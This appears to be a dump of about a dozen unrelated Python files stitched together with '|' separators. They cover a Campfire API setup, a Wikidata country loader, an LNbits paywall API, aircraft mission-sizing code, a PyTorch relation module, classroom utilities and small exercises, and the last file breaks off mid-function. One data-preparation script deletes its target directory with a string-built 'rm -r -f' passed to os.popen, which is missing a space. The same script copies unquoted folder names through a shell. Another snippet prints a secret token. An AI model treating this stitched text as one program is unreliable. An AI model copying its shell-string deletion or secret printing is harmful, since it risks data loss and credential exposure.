#!/usr/bin/env python
from distutils.core import setup
from pinder import __version__
setup(
name='pinder',
version=__version__,
description='Python API for Campfire.',
license='BSD',
author='Lawrence Oluyede',
author_email='[email protected]',
url='http://dev.oluyede.org/pinder/',
download_url='http://dev.oluyede.org/download/pinder/0.6.5/',
packages=['pinder'],
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX',
'Programming Language :: Python',
'Topic :: Communications :: Chat',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
]
)
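# A minimal local-install sketch (standard distutils usage, not specific to this
# package): `python setup.py sdist` builds a source distribution, and
# `python setup.py install` installs it into the active environment.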
|
# Copyright 2020 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=no-value-for-parameter
import requests
import pandas as pd
import streamlit as st
import os
import sys
PIPELINE_DIR = os.path.join(os.path.dirname(__file__), '../../', 'src/pipeline')
sys.path.append(PIPELINE_DIR)
import path_utils
################################################################################
##### Query wikidata for all ISO-3166-1 countries ######
################################################################################
# Wikidata query for ISO-3166-1 codes
# Use at https://query.wikidata.org/
# Workaround for a bug in generating urls for wikidata queries:
# Use the UI at https://query.wikidata.org/ to get the query url by entering these queries
# and then click the "Link" button -> SPARQL endpoint -> copy link address.
# This gives you the url for the query.
# SELECT DISTINCT ?country ?countryLabel ?capital ?capitalLabel
# WHERE
# {
# ?country wdt:P31 wd:Q3624078 .
# #not a former country
# FILTER NOT EXISTS {?country wdt:P31 wd:Q3024240}
# #and not an ancient civilisation (needed to exclude ancient Egypt)
# FILTER NOT EXISTS {?country wdt:P31 wd:Q28171280}
# OPTIONAL { ?country wdt:P36 ?capital } .
#
# SERVICE wikibase:label { bd:serviceParam wikibase:language "en" }
# }
# ORDER BY ?countryLabel
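# A sketch of building the same request programmatically instead of copying the
# encoded link from the UI (assumes the plain-text SPARQL query above is stored
# in a string named `iso_3166_1_query`; the endpoint and parameter are the
# standard wikidata SPARQL ones):
#
#   from urllib.parse import quote
#   iso_3166_1_url = ('https://query.wikidata.org/sparql?query='
#                     + quote(iso_3166_1_query))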
iso_3166_1_url = 'https://query.wikidata.org/sparql?query=%23added%20before%202016-10%0ASELECT%20DISTINCT%20%3Fcountry%20%3FcountryLabel%20%3FthreeLetterCode%20%3FnumericCode%20%3FtwoLetterCode%0AWHERE%0A%7B%0A%20%20%3Fcountry%20wdt%3AP298%20%3FthreeLetterCode.%0A%20%20%3Fcountry%20wdt%3AP299%20%3FnumericCode.%0A%20%20%3Fcountry%20wdt%3AP297%20%3FtwoLetterCode.%0A%20%20%23not%20a%20former%20country%0A%20%20FILTER%20NOT%20EXISTS%20%7B%3Fcountry%20wdt%3AP31%20wd%3AQ3024240%7D%0A%20%20%23and%20no%20an%20ancient%20civilisation%20(needed%20to%20exclude%20ancient%20Egypt)%0A%20%20FILTER%20NOT%20EXISTS%20%7B%3Fcountry%20wdt%3AP31%20wd%3AQ28171280%7D%0A%0A%20%20SERVICE%20wikibase%3Alabel%20%7B%20bd%3AserviceParam%20wikibase%3Alanguage%20%22en%22%20%7D%0A%7D%0AORDER%20BY%20%3FcountryLabel' # pylint: disable=line-too-long
countries = requests.get(iso_3166_1_url, params={'format': 'json'}).json()['results']['bindings']
country_df = pd.json_normalize(countries)
country_df = country_df.rename(columns={
'country.value': 'wikidata_id',
'twoLetterCode.value': 'country_iso_3166-1_alpha-2',
'numericCode.value': 'country_iso_3166-1_numeric',
'threeLetterCode.value': 'region_code',
'countryLabel.value': 'region_name'
})
country_df = country_df[['wikidata_id', 'country_iso_3166-1_alpha-2', 'country_iso_3166-1_numeric',
'region_code', 'region_name']]
country_df['wikidata_id'] = country_df['wikidata_id'].apply(lambda s: s.split('/')[-1])
country_df['region_code_type'] = 'iso_3166-1'
country_df['country_iso_3166-1_alpha-3'] = country_df['region_code']
country_df['region_code_level'] = 1
country_df['parent_region_code'] = 'WORLD'
country_df['subdivision_type'] = 'countries'
country_df['region_type'] = 'country'
country_df['leaf_region_code'] = country_df['region_code']
country_df['level_1_region_code'] = country_df['region_code']
country_df['level_2_region_code'] = None
country_df['level_3_region_code'] = None
st.subheader('Countries including duplicate ISO-3166-1 / ISO-3166-2 regions')
st.write(country_df)
################################################################################
##### Remove duplicates for regions that could appear as either Level 1 ######
##### or as Level 2 regions, based on whether data sources are separate ######
################################################################################
# Treat Netherlands + Aruba + Curaçao + Sint Maarten (Dutch part) as a single level 1 entity
country_df = country_df[country_df['wikidata_id'] != 'Q55']
# Keep Western Sahara wikidata entry (Q6250) instead of Q40362
country_df = country_df[country_df['wikidata_id'] != 'Q40362']
# These regions appear as both ISO-1 and ISO-2, but we will count them as ISO-2
# so we remove them from the ISO-1 list
# Taiwan, Hong Kong, and Macao are left as ISO-1 because they have separate data sources
regions_to_remove_from_iso1 = {
'ALA': 'Åland Islands', # Finland: FI-01
'BLM': 'Saint Barthélemy', # France: FR-BL Saint Barthélemy (BL)
'GUF': 'French Guiana', # France: FR-GF French Guiana (GF)
'GLP': 'Guadeloupe', # France: FR-GP Guadeloupe (GP)
'MAF': 'Saint Martin (French part)', # France: FR-MF Saint Martin (MF)
'MTQ': 'Martinique', # France: FR-MQ Martinique (MQ)
'NCL': 'New Caledonia', # France: FR-NC New Caledonia (NC)
'PYF': 'French Polynesia', # France: FR-PF French Polynesia (PF)
'SPM': 'Saint Pierre and Miquelon', # France: FR-PM Saint Pierre and Miquelon (PM)
'REU': 'Réunion', # France: FR-RE Réunion (RE)
'ATF': 'French Southern and Antarctic Lands', # France: FR-TF French Southern Territories (TF)
'WLF': 'Wallis and Futuna', # France: FR-WF Wallis and Futuna (WF)
'MYT': 'Mayotte', # France: FR-YT Mayotte (YT)
'SJM': 'Svalbard and Jan Mayen', # Norway: NO-21 Svalbard, NO-22 Jan Mayen
'BES': 'Caribbean Netherlands', # Netherlands: NL-BQ1 Bonaire (BQ), NL-BQ2 Saba (BQ), NL-BQ3 Sint Eustatius (BQ)
'ABW': 'Aruba', # Netherlands: NL-AW Aruba (AW)
'CUW': 'Curaçao', # Netherlands: NL-CW Curaçao (CW)
'SXM': 'Sint Maarten (Dutch part)', # Netherlands: NL-SX Sint Maarten (SX)
'ASM': 'American Samoa', # United States: US-AS
'GUM': 'Guam', # United States: US-GU
'MNP': 'Northern Mariana Islands', # United States: US-MP
'PRI': 'Puerto Rico', # United States: US-PR
'UMI': 'United States Minor Outlying Islands', # United States: US-UM
'VIR': 'United States Virgin Islands', # United States: US-VI
}
st.write(len(regions_to_remove_from_iso1))
country_df = country_df[~country_df['region_code'].isin(regions_to_remove_from_iso1.keys())]
st.subheader('Countries without duplicate ISO-3166-1 / ISO-3166-2 regions')
################################################################################
##### Generate datacommons ids using the known format for the dcids ######
################################################################################
country_df['datacommons_id'] = country_df.apply(lambda x: 'country/' + x['region_code'], axis=1)
st.write(country_df)
st.write(country_df.shape)
country_df.to_csv(
os.path.join(path_utils.path_to('locations_intermediate_dir'), 'iso_3166_1_locations.csv'), index=False)
|
##############################################
# The MIT License (MIT)
# Copyright (c) 2018 Kevin Walchko
# see LICENSE for full details
##############################################
# These are IntFlags, so you can compare them to ints. Members created with
# the functional API get power-of-two values starting at 1 (1, 2, 4, 8, ...):
# ZmqType.pub == 1
# ZmqType.sub == 2
# ZmqType.req == 4
#
from enum import IntFlag
Status = IntFlag('Status', 'ok error topic_not_found core_not_found multiple_pub_error invalid_zmq_type')
ZmqType = IntFlag('ZmqType', 'pub sub req rep')
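# Quick usage sketch (values follow IntFlag's power-of-two assignment):
#   Status.ok == 1              # True
#   ZmqType.pub | ZmqType.sub   # flags combine bitwise; int value 3
#   int(ZmqType.req)            # 4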
|
from openpyxl import Workbook, load_workbook
import os
import glob
import json
#directories
FIGRAM_PATH = '/media/mjia/Data/CNN-fMRI/FIGRIM/SCENES_700x700'
CROPPED_SUN_PATH = '/media/mjia/Data/CNN-fMRI/cropped'
TARGET_PATH = '/media/mjia/Data/CNN-fMRI/Pool'
if os.path.isdir(TARGET_PATH):
os.popen("rm -r -f" + TARGET_PATH)
os.popen("mkdir " + TARGET_PATH)
else:
os.popen("mkdir " + TARGET_PATH)
XLSX_FILE = 'RankSUNDatabase.xlsx'
#: experimental setup constants
NUMBER_OF_PARTICIPANTS = 50
NUMBER_OF_UNIQUE_RUNS = 8
NUMBER_OF_SHARED_RUNS = 1
UNIQUE_IMAGES_PER_UNIQUE_RUN = 56
SHARED_IMAGES_PER_UNIQUE_RUN = 8
SHARED_IMAGES_PER_SHARED_RUN = 64
NUMBER_REQUIRED_OF_PARTICIPANTS = NUMBER_OF_UNIQUE_RUNS * UNIQUE_IMAGES_PER_UNIQUE_RUN
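# Note: with the defaults above, NUMBER_REQUIRED_OF_PARTICIPANTS works out to
# 8 runs * 56 unique images = 448 unique images needed per participant.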
#the records
global_count = 0
subject_level_count = 0
residual_count = 0
selected_classes = []
#select from Figram
for dir, subdirs, files in os.walk(FIGRAM_PATH):
for class_label in subdirs:
all_files = glob.glob('{}*.jpg'.format(FIGRAM_PATH+os.sep+class_label+os.sep), recursive=True)
        # if the class contains fewer than 51 images, do not select it
if len(all_files) <= NUMBER_OF_PARTICIPANTS:
continue
global_count += len(all_files)
subject_level_count += len(all_files)//NUMBER_OF_PARTICIPANTS
residual_count += len(all_files)%NUMBER_OF_PARTICIPANTS
selected_classes.append(class_label)
class_label = class_label.replace(' ', '\ ')
os.popen("cp -r {0} {1}".format(FIGRAM_PATH+os.sep+class_label, TARGET_PATH))
print("add *" + class_label + "* to pool, current has " + str(global_count))
#select the class in RankSUNDatabase.xlsx
wb=load_workbook(XLSX_FILE)
first_sheet = wb.sheetnames[0]
worksheet = wb[first_sheet]
for i in range(2, 89):
class_label = worksheet["A"+str(i)].value.lower()
#check if it's already selected
if class_label not in selected_classes:
all_files = glob.glob('{}*.jpg'.format(CROPPED_SUN_PATH + os.sep + class_label + os.sep), recursive=True)
        # if the class contains fewer than 51 images, do not select it
if len(all_files) <= NUMBER_OF_PARTICIPANTS:
continue
global_count += len(all_files)
subject_level_count += len(all_files)//NUMBER_OF_PARTICIPANTS
residual_count += len(all_files)%NUMBER_OF_PARTICIPANTS
selected_classes.append(class_label)
class_label = class_label.replace(' ', '\ ')
os.popen("cp -r {0} {1}".format(CROPPED_SUN_PATH + os.sep + class_label, TARGET_PATH))
print("add *" + class_label + "* to pool, current has " + str(global_count))
#select the class in SUN
sorts = []
for dir, subdirs, files in os.walk(CROPPED_SUN_PATH):
for class_label in subdirs:
if class_label not in selected_classes:
all_files = glob.glob('{}*.jpg'.format(CROPPED_SUN_PATH + os.sep + class_label + os.sep), recursive=True)
if len(all_files) <= NUMBER_OF_PARTICIPANTS:
continue
sorts.append([class_label, len(all_files)])
sorts.sort(key=lambda a: a[1], reverse=True)
for iterm in sorts:
class_label = iterm[0]
length = iterm[1]
global_count += length
subject_level_count += length // NUMBER_OF_PARTICIPANTS
residual_count += length % NUMBER_OF_PARTICIPANTS
selected_classes.append(class_label)
class_label = class_label.replace(' ', '\ ')
os.popen("cp -r {0} {1}".format(CROPPED_SUN_PATH + os.sep + class_label, TARGET_PATH ))
print("add *" + class_label + "* to pool, current has " + str(global_count))
if subject_level_count >= NUMBER_REQUIRED_OF_PARTICIPANTS:
break
with open('info.json', 'w') as outfile:
json.dump(selected_classes, outfile)
print('done') |
# ---------------------------------------
# Program by Orlov.A.
#
#
# Version Date Info
# 1.0 2016 Initial Version
#
# ----------------------------------------
# x = 25
#
# if x == 25:
# print("YES, yo're right")
# else:
# print("NO!!!!!!!!!!!!!!!!!!!!!!!!")
age = 13
if (age <= 4):
print("you are baby!")
elif (age > 4) and (age <= 12):
print("you're kid!")
else:
print("you will die soon :3")
print("-------------END-----------")
cars = ['bmw', 'vw', 'seat', 'skoda', 'lada']
german_cars = ['bmw', 'vw', 'audi']
# if 'lada' in cars:
# print('omg... lada')
# else:
# print('mb will you buy some car?')
for xxx in cars:
if xxx in german_cars:
print(xxx + " is german car")
else:
print(xxx + " is not german car") |
elements = bytes([255])
print (elements[0])
|
# coding: UTF-8
import setting
TOKEN = setting.TOKEN
print(TOKEN)
## Source code below
|
# Ideal Gas Force Field
import numpy as np
class IdealGas:
def __init__(self):
pass
def __call__(self, x, *args, **kwargs):
return np.zeros_like(x) |
from http import HTTPStatus
from fastapi import Depends, Query
from starlette.exceptions import HTTPException
from lnbits.core.crud import get_user, get_wallet
from lnbits.core.services import check_invoice_status, create_invoice
from lnbits.decorators import WalletTypeInfo, get_key_type
from . import paywall_ext
from .crud import create_paywall, delete_paywall, get_paywall, get_paywalls
from .models import CheckPaywallInvoice, CreatePaywall, CreatePaywallInvoice
@paywall_ext.get("/api/v1/paywalls")
async def api_paywalls(
wallet: WalletTypeInfo = Depends(get_key_type), all_wallets: bool = Query(False)
):
wallet_ids = [wallet.wallet.id]
if all_wallets:
wallet_ids = (await get_user(wallet.wallet.user)).wallet_ids
return [paywall.dict() for paywall in await get_paywalls(wallet_ids)]
@paywall_ext.post("/api/v1/paywalls")
async def api_paywall_create(
data: CreatePaywall, wallet: WalletTypeInfo = Depends(get_key_type)
):
paywall = await create_paywall(wallet_id=wallet.wallet.id, data=data)
return paywall.dict()
@paywall_ext.delete("/api/v1/paywalls/{paywall_id}")
async def api_paywall_delete(
paywall_id, wallet: WalletTypeInfo = Depends(get_key_type)
):
paywall = await get_paywall(paywall_id)
if not paywall:
raise HTTPException(
status_code=HTTPStatus.NOT_FOUND, detail="Paywall does not exist."
)
if paywall.wallet != wallet.wallet.id:
raise HTTPException(
status_code=HTTPStatus.FORBIDDEN, detail="Not your paywall."
)
await delete_paywall(paywall_id)
raise HTTPException(status_code=HTTPStatus.NO_CONTENT)
@paywall_ext.post("/api/v1/paywalls/invoice/{paywall_id}")
async def api_paywall_create_invoice(
data: CreatePaywallInvoice,
paywall_id: str = Query(None)
):
    paywall = await get_paywall(paywall_id)
    if not paywall:
        raise HTTPException(
            status_code=HTTPStatus.NOT_FOUND, detail="Paywall does not exist."
        )
    if data.amount < paywall.amount:
raise HTTPException(
status_code=HTTPStatus.BAD_REQUEST,
detail=f"Minimum amount is {paywall.amount} sat.",
)
try:
amount = data.amount if data.amount > paywall.amount else paywall.amount
payment_hash, payment_request = await create_invoice(
wallet_id=paywall.wallet,
amount=amount,
memo=f"{paywall.memo}",
extra={"tag": "paywall"},
)
except Exception as e:
raise HTTPException(status_code=HTTPStatus.INTERNAL_SERVER_ERROR, detail=str(e))
return {"payment_hash": payment_hash, "payment_request": payment_request}
@paywall_ext.post("/api/v1/paywalls/check_invoice/{paywall_id}")
async def api_paywall_check_invoice(data: CheckPaywallInvoice, paywall_id: str = Query(None)):
paywall = await get_paywall(paywall_id)
payment_hash = data.payment_hash
if not paywall:
raise HTTPException(
status_code=HTTPStatus.NOT_FOUND, detail="Paywall does not exist."
)
try:
status = await check_invoice_status(paywall.wallet, payment_hash)
is_paid = not status.pending
except Exception:
return {"paid": False}
if is_paid:
wallet = await get_wallet(paywall.wallet)
payment = await wallet.get_payment(payment_hash)
await payment.set_pending(False)
return {"paid": True, "url": paywall.url, "remembers": paywall.remembers}
return {"paid": False}
|
from __future__ import division
from warnings import warn
from numpy import sqrt, exp, power, linspace, interp, log, pi
from environment import Atmosphere, G_0
MAX_T_TO_W = 5
class Mission(object):
"""
A mission as defined by a list of segments.
"""
def __init__(self, segments=None, atmosphere=None, *args, **kwargs):
self.atmosphere = Atmosphere() if atmosphere is None else atmosphere
if segments is not None:
self.segments = segments
else:
raise NotImplementedError("A mission generator has not been implemented yet, must provide list of segments.")
class Segment(object):
"""
    A single segment of an aircraft mission.
    :param kind: the type of segment, e.g., takeoff, cruise, dash, loiter, land
    :param speed: the speed at which the segment is to be flown (knots)
    :param altitude: the altitude at which the segment will take place (ft)
    :param atmosphere: the atmosphere instance that contains the sea level conditions; if None is provided, a standard one is created
:type kind: str
:type speed: float
:type altitude: float
:type atmosphere: ::class::`Atmosphere`
If mission is of type `cruise`:
:param range: the range to fly during the segment (nmi)
:type range: float
If mission is of type `loiter`:
:param loiter_time: time to loiter (hrs)
:type loiter_time: float
"""
_DEFAULTS = dict(warmup=dict(time=60.0),
takeoff=dict(field_length= 1500,
mu=0.05,
time=3,
obstacle_height=100),
land=dict(field_length=2500,
mu=0.18,
time=3,
obstacle_height=100),
loiter=dict(time=None),
)
_WEIGHT_FRACTIONS = dict(warmup=0.99,
taxi=0.99,
takeoff=0.98,
climb=0.95,
descend=0.98,
land=0.99,
)
def __init__(self, kind, speed, altitude, payload_released=0,
atmosphere=None,
release=None, *args, **kwargs):
self.kind = kind
if 'weight_fraction' not in kwargs and kind in self._WEIGHT_FRACTIONS:
self._weight_fraction = self._WEIGHT_FRACTIONS[kind]
else:
self._weight_fraction = kwargs.pop('weight_fraction', None)
self.altitude = altitude
self.payload_released = payload_released
self.atmosphere = Atmosphere() if atmosphere is None else atmosphere
self.density = self.atmosphere.density(altitude)
self.release = release
if speed is not None:
self.speed = speed * 1.68780986 # kts to ft/s
self.mach = self.speed / self.atmosphere.speed_of_sound(altitude)
self.n = 1
if 'turn_rate' in kwargs:
turn_rate = kwargs.pop('turn_rate')
self.n = sqrt(1 + (turn_rate * self.speed / G_0) ** 2)
if 'turn_radius' in kwargs:
turn_radius = kwargs.pop('turn_radius')
n = sqrt(1 + (self.speed / turn_radius / G_0) ** 2)
if hasattr(self, 'n'):
self.n = max(n, self.n)
self.climb_rate = kwargs.pop('climb_rate', 0)
self.acceleration = kwargs.pop('acceleration', 0)
self.dynamic_pressure = 0.5 * self.density * self.speed * self.speed
for key, defaults in self._DEFAULTS.items():
if key in self.kind:
for var, default in defaults.items():
setattr(self, var, kwargs.pop(var, default))
if 'cruise' in self.kind or 'dash' in self.kind:
self.range = kwargs.pop('range')
self.time = self.range / speed
if len(kwargs) > 0:
warn("Unused kwargs: {}".format(kwargs.keys()))
@property
def weight_fraction(self):
if self._weight_fraction is not None:
return self._weight_fraction
else:
tsfc = self.aircraft.engine.tsfc(
self.mach, self.altitude, self.afterburner)
t_to_w = self.aircraft.t_to_w * \
self.aircraft.thrust_lapse(
self.altitude, self.mach) / self.prior_weight_fraction
return 1 - exp(-tsfc * t_to_w * self.time)
        # NOTE: unreachable, incomplete alternative formulation (both branches
        # above already return):
        # self.aircraft.mach = self.mach
        # c1, c2 = self.aircraft.engine._tsfc_coefficients
        # u = (self.aircraft.cd + self.aircraft.cd_r) / self.cl
        # return exp(-(c1 / self.mach + c2) / self.atmosphere.speed_of_sound(altitude) * ())
def thrust_to_weight_required(self, aircraft, wing_loading, prior_weight_fraction=1):
if self.speed == 0:
return [0.0] * len(wing_loading) if hasattr(wing_loading, '__iter__') else 0.0
self.aircraft = aircraft
self.prior_weight_fraction = prior_weight_fraction
self.afterburner = self.aircraft.engine.afterburner and 'dash' in self.kind
aircraft.mach = self.mach
cd_0 = aircraft.cd_0
k_1 = aircraft.k_1
k_2 = aircraft.k_2
if self.release is not None:
self.aircraft.stores = [store for store in self.aircraft.stores if store not in self.release]
alpha = aircraft.thrust_lapse(self.altitude, self.mach)
beta = self.prior_weight_fraction
cd_r = aircraft.cd_r
t_to_w = None
if 'takeoff' in self.kind:
aircraft.takeoff
k_to = aircraft.k_to
cl_max = self.aircraft.cl_max
self.aircraft.cl = cl = cl_max / (k_to * k_to)
xi = self.aircraft.cd + cd_r - self.mu * self.aircraft.cl
t_to_w = linspace(0.01, MAX_T_TO_W, 200)
a = k_to * k_to * beta * beta / (self.density * G_0 * cl_max * alpha * t_to_w)
a = - (beta / (self.density * G_0 * xi)) * log(1 - xi / ((alpha * t_to_w / beta - self.mu) * cl))
b = self.time * k_to * sqrt(2 * beta / (self.density * cl_max))
c = self.field_length
w_to_s = power((-b + sqrt(b * b + 4 * a * c)) / (2 * a), 2)
self.aircraft._takeoff = {'w_to_s': w_to_s, 't_to_w': t_to_w, 'a': a, 'b': b, 'c': c}
return interp(wing_loading, w_to_s, t_to_w)
if 'land' in self.kind:
aircraft.landing
k_td = self.aircraft.k_td
cl_max = self.aircraft.cl_max
self.aircraft.cl = cl = cl_max / (k_td * k_td)
if aircraft.reverse_thrust:
alpha = -alpha
else:
alpha = 0.0
# assume drag chute
cd_chute = 0.0
if self.aircraft.drag_chute is not None:
drag_chute_diam = self.aircraft.drag_chute['diameter']
drag_chute_cd = self.aircraft.drag_chute['cd']
try:
wing_area = self.aircraft.wing.area
except AttributeError:
wing_area = 500
warn("Could not get an area for the wing (self.aircraft.wing.area), assuming 500 sqft")
cd_chute = drag_chute_cd * 0.25 * drag_chute_diam * drag_chute_diam * pi / wing_area
xi = self.aircraft.cd + cd_r - self.mu * self.aircraft.cl + cd_chute
t_to_w = linspace(0.01, MAX_T_TO_W, 200)
a = (beta / (self.density * G_0 * xi)) * log(1 + xi / ((self.mu + (alpha / beta) * t_to_w) * cl))
b = self.time * k_td * sqrt(2 * beta / (self.density * cl_max))
c = self.field_length
w_to_s = power((-b + sqrt(b * b + 4 * a * c)) / (2 * a), 2)
self.aircraft._land = {'w_to_s': w_to_s, 't_to_w': t_to_w, 'a': a, 'b': b, 'c': c}
return interp(wing_loading, w_to_s, t_to_w)
aircraft.configuration = None
q = self.dynamic_pressure
c_l = self.n * beta * wing_loading / q
excess_power = self.climb_rate / self.speed + self.acceleration / G_0
# Master Equation from Mattingly, 2002
return (beta / alpha) * (q / (beta * wing_loading) * (k_1 * c_l * c_l + k_2 * c_l + cd_0 + cd_r) + excess_power)
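# For reference, the relation returned above is a sketch of Mattingly's
# constraint-analysis "master equation", written with this module's symbols:
#   T/W = (beta/alpha) * [ q / (beta * W/S) * (k_1*CL^2 + k_2*CL + cd_0 + cd_r)
#                          + (1/V) * dh/dt + (1/g0) * dV/dt ]
# where CL = n * beta * (W/S) / q, as computed a few lines up.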
|
import torch
import torch.nn as nn
from ..utils import ConvModule
from qd3dt.core import bbox_overlaps
class Relations(nn.Module):
def __init__(self,
in_channels=1024,
inter_channels=1024,
groups=16,
num_embed_convs=1,
share_embed_convs=True,
with_loc=True):
super(Relations, self).__init__()
self.in_channels = in_channels
self.groups = groups
self.inter_channels = inter_channels
assert not in_channels % groups
self.num_embed_convs = num_embed_convs
self.share_embed_convs = share_embed_convs
self.with_loc = with_loc
self.init_embed_convs()
self.conv_out = ConvModule(
self.inter_channels * self.groups,
self.in_channels,
kernel_size=1,
activation=None,
groups=self.groups)
def init_embed_convs(self):
self.embed_convs = nn.ModuleList()
if not self.share_embed_convs:
self.ref_embed_convs = nn.ModuleList()
for i in range(self.num_embed_convs):
in_channels = self.in_channels if i == 0 else self.inter_channels
self.embed_convs.append(
ConvModule(
in_channels,
self.inter_channels,
kernel_size=1,
activation='relu',
activate_last=False,
inplace=False))
self.embed_convs.append(
ConvModule(
in_channels,
self.inter_channels,
kernel_size=1,
activation='relu',
activate_last=False))
if not self.share_embed_convs:
self.ref_embed_convs.append(
ConvModule(
in_channels,
self.inter_channels,
kernel_size=1,
activation='relu',
activate_last=False,
inplace=False))
self.ref_embed_convs.append(
ConvModule(
in_channels,
self.inter_channels,
kernel_size=1,
activation='relu',
activate_last=False))
def forward(self, in_x, rois, in_ref_x=None, ref_rois=None):
# x: [N_0, C] ref_x: [N_1, C]
# rois: [N_0, 4] ref_rois: [N_1, 4]
if in_ref_x is None:
in_ref_x = in_x
ref_rois = rois
N_0, C = in_x.shape
N_1, C_1 = in_ref_x.shape
assert C == C_1
x = in_x.view(N_0, C, 1, 1)
        ref_x = in_ref_x.view(N_1, C_1, 1, 1)
for i, embed_conv in enumerate(self.embed_convs):
x = embed_conv(x)
if not self.share_embed_convs:
ref_x = self.ref_embed_convs[i](ref_x)
else:
ref_x = embed_conv(ref_x)
# [N, G, C // G]
x = x.view(N_0, self.groups, -1)
ref_x = ref_x.view(N_1, self.groups, -1)
# [G, N_0, C // G]
x = x.permute(1, 0, 2)
# [G, C // G, N_1]
ref_x = ref_x.permute(1, 2, 0)
# [G, N_0, N_1]
matrix = torch.matmul(x, ref_x)
matrix /= x.shape[-1]**0.5
# [N_0, G, N_1]
matrix = matrix.permute(1, 0, 2)
if self.with_loc:
# [N_0, N_1]
ious = bbox_overlaps(rois[:, 1:], ref_rois[:, 1:])
ious = ious.view(N_0, 1, N_1).expand(N_0, self.groups, N_1)
matrix += torch.log(ious + 1e-6)
# [N_0, G, N_1]
matrix = matrix.softmax(dim=2)
# [N_0 * G, N_1]
matrix = matrix.view(-1, N_1)
# [N_0 * G, C] = [N_0 * G, N_1] * [N_1, C]
y = torch.matmul(matrix, in_ref_x)
# [N_0, C * G]
y = y.view(N_0, -1, 1, 1)
# [N_0, C]
y = self.conv_out(y).view(N_0, -1)
return y
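# Usage sketch (shapes and values are illustrative only): given pooled RoI
# features `feats` of shape [N, 1024] and boxes `rois` of shape [N, 5]
# (a leading batch index followed by x1, y1, x2, y2, as bbox_overlaps expects
# here),
#   relation = Relations(in_channels=1024, groups=16)
#   enhanced = relation(feats, rois)   # -> [N, 1024]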
|
T = int(raw_input())
for i in range (0,T):
money, item_price, exchange_wrapper = [int(x) for x in raw_input().split(' ')]
bought = money / item_price
answer = bought
wrappers = bought
while wrappers >= exchange_wrapper:
extra_items = wrappers / exchange_wrapper
answer += extra_items
wrappers = (wrappers % exchange_wrapper) + extra_items
print answer
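# Worked example (illustrative input): money=16, item_price=2,
# exchange_wrapper=4 buys 8 chocolates; the 8 wrappers trade for 2 more
# (wrappers become 8 % 4 + 2 = 2, below the exchange threshold), so the
# printed answer is 10.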
|
"""
abc-classroom.utils
===================
"""
import os
import subprocess
import sys
import tempfile
import textwrap
from contextlib import contextmanager
from functools import lru_cache
from shutil import copystat, copy2
from IPython import get_ipython
class Error(OSError):
pass
# a copy of shutil.copytree() that is ok with the target directory
# already existing
def copytree(
src,
dst,
symlinks=False,
ignore=None,
copy_function=copy2,
ignore_dangling_symlinks=False,
):
"""Recursively copy a directory tree.
    Unlike shutil.copytree, the destination directory may already exist.
If exception(s) occur, an Error is raised with a list of reasons.
If the optional symlinks flag is true, symbolic links in the
source tree result in symbolic links in the destination tree; if
it is false, the contents of the files pointed to by symbolic
links are copied. If the file pointed by the symlink doesn't
exist, an exception will be added in the list of errors raised in
an Error exception at the end of the copy process.
You can set the optional ignore_dangling_symlinks flag to true if you
want to silence this exception. Notice that this has no effect on
platforms that don't support os.symlink.
The optional ignore argument is a callable. If given, it
is called with the `src` parameter, which is the directory
being visited by copytree(), and `names` which is the list of
`src` contents, as returned by os.listdir():
``callable(src, names) -> ignored_names``
Since copytree() is called recursively, the callable will be
called once for each directory that is copied. It returns a
list of names relative to the `src` directory that should
not be copied.
The optional copy_function argument is a callable that will be used
to copy each file. It will be called with the source path and the
destination path as arguments. By default, copy2() is used, but any
function that supports the same signature (like copy()) can be used.
"""
names = os.listdir(src)
if ignore is not None:
ignored_names = ignore(src, names)
else:
ignored_names = set()
os.makedirs(dst, exist_ok=True)
errors = []
for name in names:
if name in ignored_names:
continue
srcname = os.path.join(src, name)
dstname = os.path.join(dst, name)
try:
if os.path.islink(srcname):
linkto = os.readlink(srcname)
if symlinks:
# We can't just leave it to `copy_function` because legacy
# code with a custom `copy_function` may rely on copytree
# doing the right thing.
os.symlink(linkto, dstname)
copystat(srcname, dstname, follow_symlinks=not symlinks)
else:
# ignore dangling symlink if the flag is on
if not os.path.exists(linkto) and ignore_dangling_symlinks:
continue
                    # otherwise let the copy occur. copy2 will raise an error
if os.path.isdir(srcname):
copytree(
srcname, dstname, symlinks, ignore, copy_function
)
else:
copy_function(srcname, dstname)
elif os.path.isdir(srcname):
copytree(srcname, dstname, symlinks, ignore, copy_function)
else:
# Will raise a SpecialFileError for unsupported file types
copy_function(srcname, dstname)
# catch the Error from the recursive copytree so that we can
# continue with other files
except Error as err:
errors.extend(err.args[0])
except OSError as why:
errors.append((srcname, dstname, str(why)))
try:
copystat(src, dst)
except OSError as why:
# Copying file access times may fail on Windows
if getattr(why, "winerror", None) is None:
errors.append((src, dst, str(why)))
if errors:
raise Error(errors)
return dst
def input_editor(default_message=None):
"""Ask for user input via a text editor"""
    if default_message is not None:
        default_message = textwrap.dedent(default_message)
with tempfile.NamedTemporaryFile(mode="r+") as tmpfile:
if default_message is not None:
tmpfile.write(default_message)
tmpfile.flush()
subprocess.check_call([get_editor(), tmpfile.name])
tmpfile.seek(0)
with open(tmpfile.name) as f:
msg = f.read()
return msg.strip()
def get_editor():
return os.environ.get("VISUAL") or os.environ.get("EDITOR") or "vi"
def _call_git(*args, directory=None):
cmd = ["git"]
cmd.extend(args)
try:
ret = subprocess.run(
cmd,
cwd=directory,
check=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
except subprocess.CalledProcessError as e:
err = e.stderr.decode("utf-8")
if err:
msg = err.split(":")[1].strip()
else:
msg = e.stdout.decode("utf-8")
raise RuntimeError(msg) from e
return ret
@lru_cache(1)
def TOP():
"""Path to the top level of the repository we are in"""
try:
ret = _call_git("rev-parse", "--show-toplevel")
except RuntimeError as e:
print(" ".join(e.args))
sys.exit(1)
return ret.stdout.decode("utf-8").strip()
def P(*paths):
"""Construct absolute path inside the repository from `paths`"""
path = os.path.join(*paths)
